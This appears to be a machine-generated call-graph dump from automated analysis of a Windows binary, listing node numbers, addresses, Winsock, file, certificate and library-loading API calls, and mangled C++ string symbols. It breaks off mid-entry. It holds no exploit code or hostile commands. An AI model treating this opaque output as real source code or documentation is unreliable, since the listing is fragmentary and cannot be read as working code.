39444->39446 39447 418004 39445->39447 39448 436e42 39446->39448 39447->39439 39448->39445 39449 436e51 CertGetNameStringW 39448->39449 39450 436e78 39449->39450 39451 436e95 LocalFree 39450->39451 39452 436e7c ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39450->39452 39453 418004 39451->39453 39454 418004 39452->39454 39453->39445 39454->39451 39455 431910 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ 39456 431959 39455->39456 39457 431969 ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39456->39457 39458 431983 39457->39458 39459 4319a6 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39458->39459 39460 43198f ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39458->39460 39461 418004 39459->39461 39462 418004 39460->39462 39463 4319b8 OpenEventW 39461->39463 39462->39459 39464 418004 39463->39464 39465 4319cf GetLastError 39464->39465 39467 4319e1 39465->39467 39466 4319f6 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39468 431a18 39466->39468 39467->39466 39469 437310 39472 437361 39469->39472 39470 437398 wcscmp 39470->39472 39471 437413 39472->39470 39472->39471 39473 4373c7 ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39472->39473 39474 418004 39473->39474 39475 4373ed ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39474->39475 39475->39471 39476 100489d0 39477 10048a04 39476->39477 39478 10048aca WSASend 39477->39478 39479 10048add WSAGetLastError 39478->39479 39480 10048b29 39478->39480 39479->39480 39481 10048aed ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39479->39481 39482 1021adf0 39481->39482 39483 10048b1a _CxxThrowException 39482->39483 39483->39480 39484 100516d0 39485 10051702 39484->39485 39486 100517eb WSASendTo 39485->39486 39487 100517f7 WSAGetLastError 39486->39487 39488 1005183e 39486->39488 39487->39488 39489 10051807 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39487->39489 39490 1021adf0 39489->39490 39491 1005182f _CxxThrowException 39490->39491 39491->39488 39492 10012256 39493 10010fca 6 API calls 39492->39493 39494 10012263 39493->39494 39495 10012269 39494->39495 39496 10011fff 8 API calls 39494->39496 39497 10012273 39496->39497 39498 10002657 39499 10002661 __EH_prolog 39498->39499 39500 10002697 RtlDeleteCriticalSection 39499->39500 39501 100903d0 39505 100904ee 39501->39505 39506 10090414 39501->39506 39503 1009053e 39504 10090535 ??3@YAXPAX 39504->39503 39505->39503 39505->39504 39506->39505 39507 1007d970 39506->39507 39509 1007d9b7 39507->39509 39514 1007d9dd 39507->39514 39508 1007d9cf ??3@YAXPAX 39508->39514 39509->39508 39510 1007d9c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39509->39510 39510->39508 39510->39510 39511 1007da52 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ?find_last_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 39512 1007dad7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 39511->39512 39513 1007da8f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39511->39513 39515 1007dae6 39512->39515 39513->39515 39514->39511 39516 1007dad2 39514->39516 39548 100090b0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39514->39548 39539 1002a3f0 39515->39539 39519 10025980 2 API calls 39516->39519 39518 1007da13 39523 1007dacd 39518->39523 39524 1007da4d 39518->39524 39521 1007dc8d 39519->39521 39521->39506 39522 1007db0b 39525 1007db1e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39522->39525 39550 10009120 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39523->39550 39549 10009120 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39524->39549 39528 1007db3e 39525->39528 39529 1007db51 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39528->39529 39530 1007db6e 39529->39530 39531 1007db9c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39530->39531 39532 1007dbbc 39531->39532 39533 1007dbcf ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39532->39533 39543 1002a760 39533->39543 39535 1007dbef 39536 1007dc02 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39535->39536 39537 1007dc22 39536->39537 39538 1007dc35 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39537->39538 39538->39516 39540 1002a404 39539->39540 39551 10026310 39540->39551 39542 1002a40b 39542->39522 39544 1002a7a3 39543->39544 39545 1002a7b8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39544->39545 39546 10025980 2 API calls 39545->39546 39547 1002a7eb 39546->39547 39547->39535 39548->39518 39549->39511 39550->39516 39552 10026329 CoInitialize CoCreateInstance 39551->39552 39554 1002634f 39551->39554 39552->39554 39553 100263cf 39553->39542 39554->39553 39555 100263c1 CoUninitialize 39554->39555 39555->39553 39556 100c8450 GetTickCount 39567 10047d20 39556->39567 39571 10045050 39556->39571 39557 100c8481 39558 100c8485 39557->39558 39559 100c84b3 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H 39557->39559 39560 100c84df 39559->39560 39561 100019a2 9 API calls 39560->39561 39562 100c8503 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 39561->39562 39563 100c8565 39562->39563 39564 100c8579 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 39563->39564 39564->39558 39579 10048b40 socket 39567->39579 39586 10050810 39567->39586 39568 10047d46 39568->39557 39572 10045061 39571->39572 39574 1004506a 39571->39574 39572->39557 39573 1004510f AtlComPtrAssign 39575 1004512c 39573->39575 39574->39573 39577 10048b40 5 API calls 39575->39577 39578 10050810 2 API calls 39575->39578 39576 1004514c 39576->39557 39577->39576 39578->39576 39580 10048bac 39579->39580 39581 10048b6f WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39579->39581 39583 10048bcf 39580->39583 39584 10048bb3 setsockopt 39580->39584 39582 1021adf0 39581->39582 39585 10048b9d _CxxThrowException 39582->39585 39583->39568 39584->39583 39585->39580 39587 1005081d CreateIoCompletionPort 39586->39587 39588 1005083b 39586->39588 39590 10050835 GetLastError 39587->39590 39591 1005083e 39587->39591 39588->39568 39590->39588 39591->39568 39592 41c7a0 39595 10007781 39592->39595 39593 41c7d3 39596 1000778d 39595->39596 39597 10007792 39595->39597 39596->39593 39597->39596 39598 10027330 4 API calls 39597->39598 39598->39596 39599 10035a60 39602 1001bb3f 39599->39602 39600 10035a79 39603 1001bb86 39602->39603 39605 1001bb4d 39602->39605 39606 1001b499 39603->39606 39605->39600 39661 10025930 39606->39661 39608 1001b4a3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39609 1001b4f2 39608->39609 39614 1001b4eb 39608->39614 39613 1001b527 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39609->39613 39609->39614 39610 1001b909 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39611 1001b998 39610->39611 39612 10025980 2 API calls 39611->39612 39615 1001b9b5 39612->39615 39616 1001b54f 39613->39616 39614->39610 39615->39605 39617 1001b553 39616->39617 39662 10018301 39616->39662 39618 1001b8f9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39617->39618 39618->39610 39620 1001b564 39621 1001b5b4 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39620->39621 39692 1006d306 39620->39692 39621->39617 39622 1001b5d4 39621->39622 39625 1001b5f4 lstrlen 39622->39625 39627 1001b5f0 39622->39627 39624 1001b5ad ??3@YAXPAX 39624->39621 39625->39627 39626 1001b61c CLSIDFromString 39629 1001b633 39626->39629 39630 1001b636 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39626->39630 39627->39626 39628 1001b576 39628->39617 39631 1001b5a1 RtlLeaveCriticalSection 39628->39631 39629->39630 39632 100269ac 39630->39632 39631->39617 39633 1001b659 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI 39632->39633 39634 1001b697 39633->39634 39635 1001b73e LoadLibraryW 39633->39635 39716 10001534 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@ ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE __EH_prolog 39634->39716 39637 1001b75d 39635->39637 39638 1001b94f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39635->39638 39642 1001b927 Mailbox 39637->39642 39647 1001b78f 39637->39647 39638->39611 39640 1001b6b8 ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39641 1001b6f5 39640->39641 39643 100013d0 4 API calls 39641->39643 39644 1001b934 FreeLibrary 39642->39644 39645 1001b70a ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39643->39645 39644->39638 39646 1001b949 39644->39646 39645->39635 39646->39638 39648 1001b7c2 RtlLeaveCriticalSection 39647->39648 39649 1001b7cc 39647->39649 39648->39649 39650 1001b882 39649->39650 39653 1001b7e2 39649->39653 39651 1001b8b4 Mailbox 39650->39651 39652 1001b8aa RtlLeaveCriticalSection 39650->39652 39654 1001b8c1 FreeLibrary 39651->39654 39652->39651 39655 1001b81e RtlLeaveCriticalSection 39653->39655 39658 1001b828 39653->39658 39656 1001b8dc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39654->39656 39657 1001b869 39654->39657 39655->39658 39656->39618 39657->39656 39658->39657 39659 1001b499 53 API calls 39658->39659 39659->39658 39661->39608 39717 10025930 39662->39717 39664 1001830b ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39665 10018328 39664->39665 39666 1001834a ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39664->39666 39667 100258ac 3 API calls 39665->39667 39668 10018358 39666->39668 39669 1001837e ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39666->39669 39688 1001832f 39667->39688 39672 100258ac 3 API calls 39668->39672 39670 1001838c 39669->39670 39671 100183af ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39669->39671 39673 100258ac 3 API calls 39670->39673 39674 100183d5 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39671->39674 39675 100183bd 39671->39675 39672->39688 39673->39688 39676 100183e3 39674->39676 39677 10018409 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39674->39677 39678 100258ac 3 API calls 39675->39678 39679 100258ac 3 API calls 39676->39679 39680 10018417 39677->39680 39681 1001843d ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39677->39681 39678->39688 39679->39688 39684 100258ac 3 API calls 39680->39684 39682 1001844b 39681->39682 39683 1001846a ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39681->39683 39685 100258ac 3 API calls 39682->39685 39686 10018497 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39683->39686 39687 10018478 39683->39687 39684->39688 39685->39688 39686->39688 39690 100184a5 39686->39690 39689 100258ac 3 API calls 39687->39689 39688->39620 39689->39688 39691 100258ac 3 API calls 39690->39691 39691->39688 39718 10025930 39692->39718 39694 1006d310 AtlComPtrAssign 39696 1006d340 39694->39696 39695 1001b572 39695->39624 39695->39628 39696->39695 39719 10071d00 39696->39719 39698 1006d4a8 39726 1006d1c4 39698->39726 39700 1006d4af AtlComPtrAssign 39730 100716f0 39700->39730 39702 1006d4c8 39734 1006d23c 39702->39734 39716->39640 39717->39664 39718->39694 39720 10071d1f 39719->39720 39723 10071d58 39719->39723 39721 100258ac 3 API calls 39720->39721 39722 10071d26 39721->39722 39722->39723 39765 10071bb0 8 API calls 39722->39765 39723->39698 39725 10071d44 39725->39698 39727 100258ac 3 API calls 39726->39727 39728 1006d1cb AtlComPtrAssign 39727->39728 39728->39700 39731 1007170f 39730->39731 39733 10071716 39730->39733 39732 100258ac 3 API calls 39731->39732 39732->39733 39733->39702 39735 1006d245 39734->39735 39738 1006d25c 39734->39738 39765->39725 39788 1013c6f0 GetCurrentThreadId 39791 1013c728 39788->39791 39789 1013c74d WSAWaitForMultipleEvents 39790 1013c762 39789->39790 39789->39791 39791->39789 39792 1013c77a WSAEnumNetworkEvents 39791->39792 39792->39791 39793 1013c78d WSAGetLastError 39792->39793 39793->39791 39794 437120 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39795 418004 39794->39795 39796 437165 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39795->39796 39797 43717e 39796->39797 39798 43718f ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39797->39798 39799 4371a4 39798->39799 39800 4371c4 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39799->39800 39801 4371ab ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39799->39801 39802 418004 39800->39802 39803 4371bd 39801->39803 39804 4371e4 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39802->39804 39803->39800 39805 437205 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39803->39805 39808 4371fd 39804->39808 39806 418004 39805->39806 39807 437225 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39806->39807 39807->39808 39809 10049460 39810 10049472 39809->39810 39811 100494cc 39810->39811 39814 10049270 39810->39814 39815 10048b40 5 API calls 39814->39815 39816 10049292 39815->39816 39817 100258ac 3 API calls 39816->39817 39818 1004929b 39817->39818 39819 100492ba 39818->39819 39827 10049060 10 API calls 39818->39827 39821 100492d2 AcceptEx 39819->39821 39822 100492ff WSAGetLastError 39821->39822 39823 1004934b 39821->39823 39822->39823 39824 1004930f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39822->39824 39825 1021adf0 39824->39825 39826 1004933c _CxxThrowException 39825->39826 39826->39823 39827->39819 39828 10040560 39831 10050810 2 API calls 39828->39831 39832 10048bf0 39828->39832 39829 10040576 39831->39829 39833 10048c23 socket 39832->39833 39834 10048c39 htons bind 39832->39834 39833->39834 39835 10048c84 WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39834->39835 39836 10048cca 39834->39836 39837 1021adf0 39835->39837 39838 10048d3e listen 39836->39838 39839 10048ccf getsockname 39836->39839 39840 10048cbb _CxxThrowException 39837->39840 39843 10048d95 39838->39843 39844 10048d4f WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39838->39844 39841 10048cf3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39839->39841 39842 10048d2c htons 39839->39842 39840->39836 39847 1021adf0 39841->39847 39842->39838 39846 10025980 2 API calls 39843->39846 39845 1021adf0 39844->39845 39848 10048d83 _CxxThrowException 39845->39848 39849 10048db3 39846->39849 39850 10048d1d _CxxThrowException 39847->39850 39848->39843 39849->39829 39850->39842 39851 100491e0 39853 100491f2 39851->39853 39852 10049218 39857 1003c190 39852->39857 39853->39852 39854 10048b40 5 API calls 39853->39854 39854->39852 39858 1003c1d0 39857->39858 39859 1003c230 RtlEnterCriticalSection 39858->39859 39861 1003c219 39858->39861 39860 1003c258 39859->39860 39886 1003c2b7 39860->39886 39897 100394e0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39860->39897 39862 10025980 2 API calls 39861->39862 39863 1003c625 39862->39863 39864 1003c5ff RtlLeaveCriticalSection 39864->39861 39866 1003c2f4 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ GetTickCount 39867 10039640 20 API calls 39866->39867 39868 1003c350 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@H ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39867->39868 39869 1003c534 ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 39868->39869 39870 1003c39e 39868->39870 39871 1003c557 39869->39871 39872 1003c55e inet_addr 39869->39872 39870->39869 39873 1003c3b5 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39870->39873 39871->39872 39874 1003c56a 39872->39874 39873->39869 39875 1003c3dc 39873->39875 39898 10039b70 39874->39898 39875->39869 39877 1003c3e7 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39875->39877 39877->39869 39879 1003c406 39877->39879 39878 1003c596 39881 1003c5c4 39878->39881 39882 1003c5df 39878->39882 39879->39869 39880 1003c41d ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39879->39880 39880->39869 39883 1003c43e 39880->39883 39902 10039540 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??3@YAXPAX ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE Mailbox 39881->39902 39903 10039540 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??3@YAXPAX ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE Mailbox 39882->39903 39883->39869 39885 1003c449 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39883->39885 39885->39869 39888 1003c468 39885->39888 39886->39864 39888->39869 39889 1003c47f ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39888->39889 39889->39869 39890 1003c4a0 39889->39890 39890->39869 39891 1003c4ab ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH 39890->39891 39891->39869 39892 1003c4c6 39891->39892 39892->39869 39893 1003c4d5 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39892->39893 39893->39869 39894 1003c4f2 39893->39894 39894->39869 39895 1003c4f9 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD 39894->39895 39895->39869 39896 1003c516 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 39895->39896 39896->39869 39897->39866 39901 10039b8b 39898->39901 39900 10039bc0 39900->39878 39904 10039910 39901->39904 39902->39886 39903->39886 39905 10039934 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0exception@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ _CxxThrowException 39904->39905 39906 1003998d 39904->39906 39905->39906 39909 10039870 39906->39909 39908 100399a7 39908->39900 39910 100258ac 3 API calls 39909->39910 39911 10039898 39910->39911 39912 100398cf 39911->39912 39914 100395a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39911->39914 39912->39908 39914->39912 39915 10114674 39916 10114685 39915->39916 39917 1011467e ??3@YAXPAX 39915->39917 39917->39916 39918 10001b65 39924 10025930 39918->39924 39920 10001b6f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 39925 10015899 39920->39925 39922 10001bad ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39923 10001bcf 39922->39923 39924->39920 39926 100158a3 __EH_prolog 39925->39926 39935 1000104f RtlEnterCriticalSection 39926->39935 39928 100158b6 39929 100013d0 4 API calls 39928->39929 39930 100158ca 39929->39930 39936 100155da ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 39930->39936 39932 100158de ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39933 10015909 RtlLeaveCriticalSection 39932->39933 39934 100158f2 39932->39934 39933->39922 39934->39933 39935->39928 39936->39932 39937 42e8ab GetTempPathW 39938 42e907 lstrcatW GetFileAttributesW 39937->39938 39939 42e8f8 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 39937->39939 39941 42e934 lstrcatW ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 39938->39941 39942 42e928 CreateDirectoryW 39938->39942 39940 42e94c 39939->39940 39941->39940 39942->39941 39962 425a30 39963 4182d4 39962->39963 39964 425a70 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39963->39964 39965 425a8e 39964->39965 39966 425a9b ?assign@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@ 39965->39966 39967 418004 39966->39967 39968 425ad0 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39967->39968 39969 418004 39968->39969 39970 425ae9 ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39969->39970 39971 425b00 39970->39971 39972 425b3a ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39971->39972 39973 418004 39972->39973 39974 425b56 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39973->39974 39975 425b68 39974->39975 39976 425bb6 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39975->39976 39977 425b75 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39975->39977 39979 418004 39976->39979 39978 418004 39977->39978 39980 425b92 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39978->39980 39981 425bc8 LoadLibraryW 39979->39981 39988 425bab 39980->39988 39982 425bd8 39981->39982 39983 425cb3 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39982->39983 39984 425be5 GetProcAddress 39982->39984 39985 418004 39983->39985 39990 425bfd 39984->39990 39986 425cd2 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39985->39986 39986->39988 39987 425ca0 FreeLibrary 39989 418004 39987->39989 39989->39983 39990->39987 39991 425c19 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI 39990->39991 39992 425c58 39991->39992 39993 425c87 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39992->39993 39994 425c67 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 39992->39994 39996 418004 39993->39996 39995 425c83 39994->39995 39995->39993 39996->39987 39997 10026cf0 39998 10026dc5 39997->39998 39999 10026d1b WriteFile 39997->39999 40000 10026d79 39999->40000 40001 10026d39 GetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39999->40001 40000->39998 40003 10026d7f GetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 40000->40003 40002 1002bc50 40001->40002 40004 10026d6a _CxxThrowException 40002->40004 40005 1002bc50 40003->40005 40004->40000 40006 10026db3 _CxxThrowException 40005->40006 40006->39998 40007 100266f0 40008 10025ed0 40007->40008 40009 1002670f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 40008->40009 40010 10026774 40009->40010 40011 10026782 GetPrivateProfileSectionA 40010->40011 40012 100267b1 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 